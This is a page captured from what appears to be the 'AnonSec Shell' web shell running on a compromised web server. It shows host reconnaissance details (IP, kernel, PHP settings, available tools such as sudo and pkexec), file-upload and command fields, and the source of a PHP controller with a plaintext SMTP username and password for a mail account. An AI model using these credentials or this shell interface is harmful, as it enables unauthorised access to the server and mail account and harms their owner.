AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.217.103
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/public_html/lrsys_projetos/sopizzas/application/controllers/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/public_html/lrsys_projetos/sopizzas/application/controllers/test_smtp.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
session_start(); //we need to call PHP's session object to access it through CI
class AddNewRestaurant extends CI_Controller {

  function __construct()
  {
     parent::__construct();
     
     
  }

  function index( $restaurant_id = 0 )
  {

    $name = "test";
    $phone = "999099877";
    $email = "test@gmail.com";

      $config = Array(
      'protocol' => 'smtp',
      'smtp_host' => 'mail.orderingsystemonline.com',
      'smtp_port' => 465,
      'smtp_user' => 'noreply@orderingsystemonline.com',
      'smtp_pass' => 'EVtfEKND9&lF', 
      'mailtype' => 'html',
      'charset' => 'iso-8859-1',
      'wordwrap' => TRUE
      );
      $this->load->library('email', $config);

      $this->email->from('noreply@orderingsystemonline.com', 'orderingsystemonline.com');
      $this->email->to('earthtechnology5@gmail.com');
      //$this->email->reply_to('my-email@gmail.com', 'Explendid Videos');


      $this->email->subject('orderingsystemonline.com - Test Mail');

      $message = "Contact form\n\n";
      $message .= "Name: ". $name . "\n";
      $message .= "Phone: ". $phone . "\n";
      $message .= "Email: ". $email . "\n";

      $this->email->message($message);

      $this->email->send();

  }


}


Anon7 - 2022
AnonSec Team